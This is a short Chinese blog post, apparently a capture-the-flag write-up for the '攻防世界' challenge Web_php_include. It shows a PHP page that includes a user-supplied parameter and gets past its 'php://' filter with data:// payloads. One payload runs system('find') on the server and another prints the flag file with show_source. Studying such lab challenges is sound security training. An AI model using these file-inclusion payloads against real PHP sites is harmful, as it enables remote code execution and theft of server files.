文件包含_Web_php_include

Web_php_include 攻防世界

#题目
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

审计代码可知,含有include为文件包含,所以只需要对page进行传参即可

有替换即page中不可以存在“php://”,所以使用data协议(include函数可以触发php://、data://协议等)

题解
1.?page=data://text/plain,<?php system("find");?>
	获取到当前目录文件:. ./index.php ./phpinfo.php ./fl4gisisish3r3.php 
2.?page=data://text/plain,<?php show_source('fl4gisisish3r3.php')?>
	获取到flag
posted @ 2025-09-04 21:52  lieer  阅读(3)  评论(0)    收藏  举报